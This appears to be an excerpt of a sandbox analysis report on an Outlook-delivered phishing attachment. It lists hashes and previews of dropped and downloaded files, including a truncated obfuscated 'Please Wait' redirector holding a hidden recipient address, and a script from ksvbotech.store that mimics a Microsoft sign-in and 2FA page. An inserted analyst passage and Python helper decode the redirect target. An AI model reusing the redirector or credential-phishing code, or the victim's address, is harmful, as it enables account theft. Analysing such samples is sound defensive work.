      MD5:1AF87B60820D2A9FCF37480B1AC9C66F
      SHA1:627CD793B5D093CA6D97B03186390031E8214798
      SHA-256:EF5FE4103F48BF735FCF573E80717699C25E45E8AFB570685CF145AEE33410B6
      SHA-512:F14BA5F8A566085322C772F91C95FEDD5D19149BCF1484D81C86EC1D6C545B0242B74BC6D317576D959AC52E3D56C71B54EC13898248C21794F9B4F0C65C88A9
      Malicious:false
      Reputation:unknown
      Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Please Wait</title>..</head>..<body>..<p id="uxo" style="display:none;">uday.dukkipati@tdwilliamson.com</p>....<script>..const _0x19e8b5=_0x1be1;function _0xd048(){const _0x2759b6=['16940nTwiYF','2801908EyDxtQ','getElementById','abcdefghijklmnopqrstuvwxyz','2399130RTFwvl','innerText','7najGmm','uxo','1198248hbTyhv','includes','2583790VrRdBf','wcpufdi.tupsf/hftq/nth.iunm','join','://','length','1107852ngmrMf','4771404RMeFKW','location'];_0xd048=function(){return _0x2759b6;};return _0xd048();}(function(_0x5d9d3a,_0x27671e){const _0x11bf02=_0x1be1,_0x4ab80e=_0x5d9d3a();while(!![]){try{const _0x3b5f75=-parseInt(_0x11bf02(0x202))/0x1+-parseInt(_0x11bf02(0x1ff))/0x2+parseInt(_0x11bf02(0x1f4))/0x3+-parseInt(_0x11bf02(0x1f1))/0x4+parseInt(_0x11bf02(0x1fa))/0x5+parseInt(_0x11bf02(0
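The dropped "Please Wait" page (the two entries above carry the same hashes and preview) is a redirector rather than the lure itself: the recipient's address sits in a hidden <p id="uxo">, and the redirect target is kept in a javascript-obfuscator string array where 'wcpufdi.tupsf/hftq/nth.iunm' is the real text with every lowercase letter moved one place forward in the alphabet (the same array holds 'abcdefghijklmnopqrstuvwxyz', 'includes', 'join', '://' and 'location', the pieces a shift-and-redirect needs). Shifting the letters back yields vbotech.store/gesp/msg.html, which is a suffix of the ksvbotech.store host the browser went on to contact; the scheme, the "ks" prefix and how the hidden address is appended are not visible in the truncated preview, so they are not claimed here. The Python below is an added analyst example, not code from the report or from the sample: it extracts the hidden address and the string array from a constructed copy of the page (the array entries are the ones in the preview, the recipient address is a placeholder) and recovers the shifted entry by undoing each possible rotation and keeping the decoding whose host ends in a plausible TLD. KNOWN_TLDS is an assumption of the example.

```python
"""Recover the hidden recipient and the letter-shifted redirect target from a
'Please Wait' redirector page.  Added example; not code from the report."""
import re
import string
from typing import List, Optional, Tuple

# Constructed stand-in for the dropped file.  The array entries are copied from
# the report's preview; the recipient address is a placeholder.
SAMPLE_HTML = """<!DOCTYPE html>
<html lang="en"><head><meta charset="UTF-8"><title>Please Wait</title></head>
<body>
<p id="uxo" style="display:none;">victim@example.com</p>
<script>
function _0xd048(){const _0x2759b6=['16940nTwiYF','2801908EyDxtQ','getElementById','abcdefghijklmnopqrstuvwxyz','2399130RTFwvl','innerText','7najGmm','uxo','1198248hbTyhv','includes','2583790VrRdBf','wcpufdi.tupsf/hftq/nth.iunm','join','://','length','1107852ngmrMf','4771404RMeFKW','location'];_0xd048=function(){return _0x2759b6;};return _0xd048();}
</script>
</body></html>
"""

ALPHABET = string.ascii_lowercase

# TLDs accepted when ranking decoded candidates (assumption; widen as needed).
KNOWN_TLDS = {"com", "net", "org", "info", "xyz", "top", "site", "store"}


def shift_letters(text: str, shift: int) -> str:
    """Rotate every lowercase letter by `shift` positions and leave everything
    else (dots, slashes, digits) untouched.  The dropped script stores its URL
    shifted by +1, so shift -1 undoes it."""
    return "".join(
        ALPHABET[(ALPHABET.index(c) + shift) % 26] if c in ALPHABET else c
        for c in text
    )


def string_array(html: str) -> List[str]:
    """Return the entries of the first javascript-obfuscator style string
    array, i.e. an array literal made only of single-quoted strings."""
    m = re.search(r"=\[('(?:[^'\\]|\\.)*'(?:,'(?:[^'\\]|\\.)*')*)\]", html)
    return re.findall(r"'((?:[^'\\]|\\.)*)'", m.group(1)) if m else []


def hidden_email(html: str) -> Optional[str]:
    """Return the text of a display:none <p> that holds an email address; the
    page carries the victim's identity this way for the next hop."""
    pat = r'<p[^>]*style="[^"]*display:\s*none[^"]*"[^>]*>([^<]*)</p>'
    for m in re.finditer(pat, html):
        text = m.group(1).strip()
        if re.fullmatch(r"[^@\s]+@[^@\s]+\.[^@\s]+", text):
            return text
    return None


def candidate_urls(entries: List[str]) -> List[Tuple[str, int, str]]:
    """For each array entry undo every possible forward shift (1..25) and keep
    the decodings that look like host/path with a known TLD.  Each result is
    (original entry, forward shift the obfuscator used, decoded text)."""
    host_path = re.compile(r"^([a-z0-9-]+(?:\.[a-z0-9-]+)+)(/[\w./-]*)?$")
    found = []
    for entry in entries:
        for fwd in range(1, 26):
            decoded = shift_letters(entry, -fwd)
            m = host_path.match(decoded)
            if m and m.group(1).rsplit(".", 1)[-1] in KNOWN_TLDS:
                found.append((entry, fwd, decoded))
    return found


if __name__ == "__main__":
    print("hidden recipient:", hidden_email(SAMPLE_HTML))
    for entry, fwd, url in candidate_urls(string_array(SAMPLE_HTML)):
        print(f"{entry!r} -> {url!r} (letters were shifted forward by {fwd})")
```

To run it against the real dropped file, read the file's contents into the place of SAMPLE_HTML; if nothing is reported, widen KNOWN_TLDS before assuming a different encoding, since the TLD filter is what separates the one correct rotation from the other 24.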
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:modified
      Size (bytes):26
      Entropy (8bit):3.95006375643621
      Encrypted:false
      SSDEEP:
      MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
      SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
      SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
      SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
      Malicious:false
      Reputation:unknown
      Preview:[ZoneTransfer]..ZoneId=3..
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:RFC 822 mail, ASCII text, with very long lines (1945), with CRLF line terminators
      Category:dropped
      Size (bytes):30255
      Entropy (8bit):6.089587595810953
      Encrypted:false
      SSDEEP:
      MD5:7A32B97E3D458EC37679C7F38A04384D
      SHA1:AEC9BE54C67B1457A00D1A95867E47863EE1B7A4
      SHA-256:DCC6B54CD23DBD5BE2C0C10CF31CEFCF1EB8882FEC554D51A8AD8B335EC0932B
      SHA-512:CF21A2FA0DDF3F8B6A7F7740C5C36D17B6841FC0935C7F090F00FABCDD5024EBCDCA04577FD7D210D06473EA77AB4361572F77E7E0F3DCB9EE71CAFA823D2D75
      Malicious:false
      Reputation:unknown
      Preview:Received: from SJ0PR08MB7665.namprd08.prod.outlook.com.. (2603:10b6:a03:3f5::12) by DM3PR08MB9118.namprd08.prod.outlook.com with.. HTTPS; Wed, 18 Sep 2024 20:54:24 +0000..Received: from SJ0PR13CA0109.namprd13.prod.outlook.com.. (2603:10b6:a03:2c5::24) by SJ0PR08MB7665.namprd08.prod.outlook.com.. (2603:10b6:a03:3f5::12) with Microsoft SMTP Server (version=TLS1_2,.. cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.7982.17; Wed, 18.. Sep 2024 20:54:15 +0000..Received: from SJ1PEPF00001CE3.namprd05.prod.outlook.com.. (2603:10b6:a03:2c5:cafe::d3) by SJ0PR13CA0109.outlook.office365.com.. (2603:10b6:a03:2c5::24) with Microsoft SMTP Server (version=TLS1_2,.. cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.7982.9 via Frontend.. Transport; Wed, 18 Sep 2024 20:54:15 +0000..Received: from NAM12-DM6-obe.outbound.protection.outlook.com.. (40.107.243.113) by SJ1PEPF00001CE3.mail.protection.outlook.com.. (10.167.242.11) with Microsoft SMTP Server (version=TLS1_2,.. cipher=TLS_ECDHE_RSA_WI
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:ASCII text, with very long lines (28758), with CRLF line terminators
      Category:dropped
      Size (bytes):20971520
      Entropy (8bit):0.16156667915991862
      Encrypted:false
      SSDEEP:
      MD5:667EC1E8436A52ADCDD6F2ED56CAA322
      SHA1:ED913375D71FDFCD64D8736B47466B215DFAA2FF
      SHA-256:BFE45215178D6A92DF7A62C348E334B81709B8E0994CF140E0AB3B2D145D6F61
      SHA-512:4E807BBE0E49FB11F82AB9BC24054A60CBCE81A5801CA1FC611A3DD9D6D673AA1A47EF132A59061CE0ACF9003495C84A832EFF3F07E8275DEA8D421077E37C5C
      Malicious:false
      Reputation:unknown
      Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..09/19/2024 09:36:26.046.OUTLOOK (0x18E0).0x18E4.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":25,"Time":"2024-09-19T09:36:26.046Z","Contract":"Office.System.Activity","Activity.CV":"ldqQlYLRtEGqIHcnA3nFuQ.4.11","Activity.Duration":13,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...09/19/2024 09:36:26.062.OUTLOOK (0x18E0).0x18E4.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":27,"Time":"2024-09-19T09:36:26.062Z","Contract":"Office.System.Activity","Activity.CV":"ldqQlYLRtEGqIHcnA3nFuQ.4.12","Activity.Duration":11838,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajor
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:data
      Category:dropped
      Size (bytes):20971520
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:
      MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
      SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
      SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
      SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
      Malicious:false
      Reputation:unknown
      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:data
      Category:dropped
      Size (bytes):122880
      Entropy (8bit):4.524291097915957
      Encrypted:false
      SSDEEP:
      MD5:F07D05E18D42F0BB09FA978CEA5DF622
      SHA1:7291412A671D7AD927B0A554AA2BFE025D221954
      SHA-256:9BB4928919884DF977DCCB26F9B11D3C9C72671F116E4B0AFACE46DC8B229BD6
      SHA-512:32FF3184FA163DFF4906F0B2748688CD9C3D32C7C1B34AF6802297267797A02FBC3D5D22AB398873443E75F5617D4B18D6BA471F50AB48722F017632A4B823EE
      Malicious:false
      Reputation:unknown
      Preview:............................................................................`...........=.ew...................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@.6<.Y..........=.ew...........v.2._.O.U.T.L.O.O.K.:.1.8.e.0.:.8.6.0.3.4.3.8.0.9.e.c.0.4.8.f.9.9.d.6.d.6.c.e.8.0.e.e.7.2.a.6.2...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.0.9.1.9.T.0.5.3.6.2.5.0.8.0.8.-.6.3.6.8...e.t.l.......P.P.........=.ew...........................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:data
      Category:dropped
      Size (bytes):16384
      Entropy (8bit):3.597916786515241
      Encrypted:false
      SSDEEP:
      MD5:FEA7B64B4745C33A6258F1E1119D0702
      SHA1:5F3855A566E3458D84BE5D1C9F30EC8F76541930
      SHA-256:78D4B409CDD80C8FE1FAE16096B56AC920A172DAE2F7266616BEE1C2000C618B
      SHA-512:E01F516DA778DB03D9AD62E45D0A55D62681DF98EA2099440FD13770F4084D6408EC8A8C320223236A5A155CEB836B262C3799FFA44898AE67AB8F97FC42FA86
      Malicious:false
      Reputation:unknown
      Preview:............................................................................`...\.......s..nw...................eJ.......N.nw...Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@.6<.Y..........s..nw...........v.2._.O.U.T.L.O.O.K.:.1.a.8.4.:.5.2.1.2.3.e.c.0.b.f.d.c.4.c.b.e.9.d.e.7.a.0.3.1.9.e.4.9.d.c.4.4...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.0.9.1.9.T.0.5.3.6.4.1.0.1.3.6.-.6.7.8.8...e.t.l.......P.P.\.......s..nw...........................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:data
      Category:dropped
      Size (bytes):30
      Entropy (8bit):1.2389205950315936
      Encrypted:false
      SSDEEP:
      MD5:5E20510C5868A6BE58830457AE7FE3D5
      SHA1:026C954DD94F1FDD78B68AE9F0E70E0CA01530B4
      SHA-256:D6CB2D3765173A40BD45C6DA9E7849AFC6ADEDCF2BCF03C773459164C5D5F42E
      SHA-512:F71258D04E7F611DCBF1FEC35E9B6B1CFFF4F5969D8E427A8A14C11286675472DBA0FA8C53A7B1E9519C18DB55225E2B61767DFD6E2DF29C3AADD9C738C18F72
      Malicious:false
      Reputation:unknown
      Preview:..............................
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):16384
      Entropy (8bit):0.6691625330788578
      Encrypted:false
      SSDEEP:
      MD5:C9EFA865BF1B3CF89F099541559ED3C8
      SHA1:4911609661691F2C59B6C0E377D9B0DFB9DB5139
      SHA-256:81568452E8A90C96DC00C976341215772967037B4EFE88747C592A74EF839526
      SHA-512:8627A5CA8279C32256A9D517EF99A4CB56D34D76D025DBFA6CE592A905B3506A32337AC86D72F392247719A3BE12B0F1435E01A668340D43DB1AAD238011788F
      Malicious:false
      Reputation:unknown
      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 19 08:36:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2673
      Entropy (8bit):3.986975347354126
      Encrypted:false
      SSDEEP:
      MD5:3AB96404E61AE4D07A347CB3EFA14BDD
      SHA1:3516A017FCA0E4618DC2C2807353F1409328CE50
      SHA-256:289B547656CA08622A173A9B4A796AA176CFCE25732D197EAA2BE401A6A25006
      SHA-512:DAFA6295169187210A88A23AA0AD3A1C1D4DAB7E116CCB7E2D97D7996CA58603431D01A44B45C1562B3B22AEAA057413AA64A1452A4B8AA08440D30CC13A7EB0
      Malicious:false
      Reputation:unknown
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 19 08:36:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2675
      Entropy (8bit):4.002511732556609
      Encrypted:false
      SSDEEP:
      MD5:D464D0A4BD02924CE1CB05FA6B449C38
      SHA1:8AB76B5D7A110FE718BC3D63B753DB63712579AB
      SHA-256:9CB483F60F1A30BBCC12012C1CD48020036A5B5B1B4E987A6A7649AB70A635F9
      SHA-512:6AC49333B537B49B416761AEA15612250B52F213CFA90ADC0EDD92CF91A237394773A716E2A8682C5C7268315ECE58C4B67D38CAF995BFF83ADA07C2F73FAF9F
      Malicious:false
      Reputation:unknown
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2689
      Entropy (8bit):4.007333538132257
      Encrypted:false
      SSDEEP:
      MD5:E8319CFAA68E1BDCC838B5041C01CE60
      SHA1:BA1A30686C77E52CF6D95771260C4391224E928A
      SHA-256:880A5F1F9F1E1B52941249A294B704D6B090F417F55ACC39CB0F8B0F3FD579F3
      SHA-512:0A8C9015B17AE6AC2F1811D04F5236203A6156659728861C2D1B64D4449D7C28E43EA6AB80C03C684B39383F26615076BAC87BBC0DE59B451C8896518E40DE6C
      Malicious:false
      Reputation:unknown
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 19 08:36:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2677
      Entropy (8bit):4.001784084079385
      Encrypted:false
      SSDEEP:
      MD5:4D48B1F79274B98C86AB36281229B366
      SHA1:2E59E37CC110033EBC7C75EFF9320E7BFB13E6D9
      SHA-256:AF8E620E368EA011FFBB236614CBFB164E1AB0E51E5ED3EB4ECF0B15A4F2653C
      SHA-512:827068C31DBA335641C99D8F480790F2331E91743D080C3CF66E23438A9C0E9F3D5BA18D46AA637EF172F7B41FD439032BC0566F9547B461161834C45A3BC1BC
      Malicious:false
      Reputation:unknown
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 19 08:36:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2677
      Entropy (8bit):3.991186274283029
      Encrypted:false
      SSDEEP:
      MD5:AD4A8CC99C12E9BD95FF8D69F8C558FA
      SHA1:07684644FF731CA616E7581677FB176123794EB6
      SHA-256:AE7729943B1784769A5566EC8EA107E6B464D2DF900593D65938B4C1D42F1F90
      SHA-512:E4EF33F8FE665CC5E7EF49D0EC1B5B3BAD3A5FE94E9F632AEC4A7AF5ABF3F3A4BAA0BBCA727E15650C6A3FDB262F5E1DC53ACBAA5073BD3C4F1CD9053E8B3B63
      Malicious:false
      Reputation:unknown
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 19 08:36:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2679
      Entropy (8bit):3.9964833119593073
      Encrypted:false
      SSDEEP:
      MD5:CEFB6C01D3522E216287A7AE815E3D13
      SHA1:256EB752C66E23D5132121675262EEDD9AF60364
      SHA-256:8EDDCBF25FFFBAD61B65CC66202BDEE97D92B7482A0BA20DCD1DAB58D8890521
      SHA-512:1F763DD3D1ED00EADD89323A2D32C15E40B46711259FD0D04741A327E2E9A525EC96F41F95424784FAB4BB3E1401611466A2ECAA65E71291590CC20B3AB471E5
      Malicious:false
      Reputation:unknown
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:Microsoft Outlook email folder (>=2003)
      Category:dropped
      Size (bytes):271360
      Entropy (8bit):4.126423415168088
      Encrypted:false
      SSDEEP:
      MD5:21D4F0DE55E7EFBA75CBA13896379558
      SHA1:5212C4C2BCAC40ED629D57FD7E89D28643F58E27
      SHA-256:88DA65C9B84830CA880B7193E4B171493C63DFC20CBCE16A1E01F74CBA945BB5
      SHA-512:8B3F503ED25DEBC5F550B777B436E77973F060BECCA57F6DF0D4C0F841C0E9DC11974E58AC032A3CFDBD7237A26465745B6CCA92806661243F426D81BB3EFC39
      Malicious:false
      Reputation:unknown
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:data
      Category:dropped
      Size (bytes):262144
      Entropy (8bit):3.986057485153415
      Encrypted:false
      SSDEEP:
      MD5:B6911A6DF6A52C1A4E1692D79E47F1AB
      SHA1:DE803D225F8B9D21E63CC8FD936976925128AEC4
      SHA-256:E5E235D8C2DC853CFB7CAC285B665591AF271717242EB14C23470C7C88E47064
      SHA-512:68A1437A689CE56504C3DC893AFDE5909349AB29953D5A5F0B24D88B4EBCA089A017A1448A0797E6600A6DE4523B9D239D4167E39316D8BD45B3673B19461953
      Malicious:false
      Reputation:unknown
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (4191), with CRLF line terminators
      Category:downloaded
      Size (bytes):59006
      Entropy (8bit):4.8668087324631095
      Encrypted:false
      SSDEEP:
      MD5:A0E2B5673A02086C508B98283D3DA9AC
      SHA1:BDA752205408484FB54346DA969E09218384588F
      SHA-256:753A9F4EF8C9200639BD543B9D2B72565A2E62AF3F5DCDC5DB8EA3A7E34C6698
      SHA-512:780B582BBB2BA29C7AFC2268152A663E2744A3D2150555F478CA79AE11BBACCFDF1F7AE8F6100BF35EC17DA24130AFDD663DC64594A24A340C46ADC29F6ADAD8
      Malicious:false
      Reputation:unknown
      URL:https://ksvbotech.store/gesp/xls/0xa937eg29be0xcs.js
      Preview:var _0x7704 = [.. 'ready',.. '#ai',.. '#next',.. '.logoimg',.. 'src',.. 'https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico',.. '#div1',.. '#div2',.. '#aich',.. '#error',.. '#submit-btn',.. '#div4',.. '#verify-2fa',.. '#div5',.. '#sign-in-another-way',.. '#div6',.. '#verify-text-2fa',.. 'https://logo.clearbit.com/',.. 'show',.. '1|2|3|4|0',.. 'HEAD',.. '#pr',.. '#div3',.. 'success',.. '#user-email-otc',.. 'two_way_voice',.. '2|4|3|0|1',.. 'Your\x20account\x20or\x20password\x20is\x20incorrect.\x20If\x20you\x20don\x27t\x20remember\x20your\x20password,\x20<a\x20href=\x27#\x27>reset\x20it\x20now</a>',.. '1|4|0|2|3',.. 'Sorry,\x20your\x20sign-in\x20timed\x20out.\x20Please\x20sign\x20in\x20again.',.. '#msg',.. 'Internal\x20server\x20error.',.. 'JSON',.. '#msg-2fa',.. 'Incorrect\x202FA\x20code.\x20Try\x20again.',.. '#2fa-code',.. 'WebSocket\x20con
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (32030)
      Category:downloaded
      Size (bytes):86709
      Entropy (8bit):5.367391365596119
      Encrypted:false
      SSDEEP:
      MD5:E071ABDA8FE61194711CFC2AB99FE104
      SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
      SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
      SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
      Malicious:false
      Reputation:unknown
      URL:https://code.jquery.com/jquery-3.1.1.min.js
      Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (32065)
      Category:downloaded
      Size (bytes):85578
      Entropy (8bit):5.366055229017455
      Encrypted:false
      SSDEEP:
      MD5:2F6B11A7E914718E0290410E85366FE9
      SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
      SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
      SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
      Malicious:false
      Reputation:unknown
      URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
      Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
      Category:dropped
      Size (bytes):17174
      Entropy (8bit):2.9129715116732746
      Encrypted:false
      SSDEEP:
      MD5:12E3DAC858061D088023B2BD48E2FA96
      SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
      SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
      SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
      Malicious:false
      Reputation:unknown
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):290960
      Entropy (8bit):5.1082980298031435
      Encrypted:false
      SSDEEP:
      MD5:24FA855A7678B1938F16235881E3E80B
      SHA1:67B6C9946134456D67C07765D230130D8679F8C6
      SHA-256:F2A84BC4F4CB8AE04162F42F1F3EBED1E05725D9B5BF666B885356C7698A071F
      SHA-512:D1EAB0379A8736F8B14E73478F101A2656912C7FBB9B7D90707E6E8F782C09BEC4B017EB86781E5B4D4AE8A37B3F89A931249527E839F28BEE1389DE21BD79C7
      Malicious:false
      Reputation:unknown
      Preview:/*!.. * jQuery JavaScript Library v3.4.1.. * https://jquery.com/.. *.. * Includes Sizzle.js.. * https://sizzlejs.com/.. *.. * Copyright JS Foundation and other contributors.. * Released under the MIT license.. * https://jquery.org/license.. *.. * Date: 2019-05-01T21:04Z.. */..( function( global, factory ) {....."use strict";.....if ( typeof module === "object" && typeof module.exports === "object" ) {......// For CommonJS and CommonJS-like environments where a proper `window`....// is present, execute the factory and get jQuery.....// For environments that do not have a `window` with a `document`....// (such as Node.js), expose a factory as module.exports.....// This accentuates the need for the creation of a real `window`.....// e.g. var jQuery = require("jquery")(window);....// See ticket #14549 for more info.....module.exports = global.document ?.....factory( global, true ) :.....function( w ) {......if ( !w.document ) {.......throw new Error( "jQuery requires a window with a docume
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with CRLF line terminators
      Category:downloaded
      Size (bytes):258912
      Entropy (8bit):4.694788011500782
      Encrypted:false
      SSDEEP:
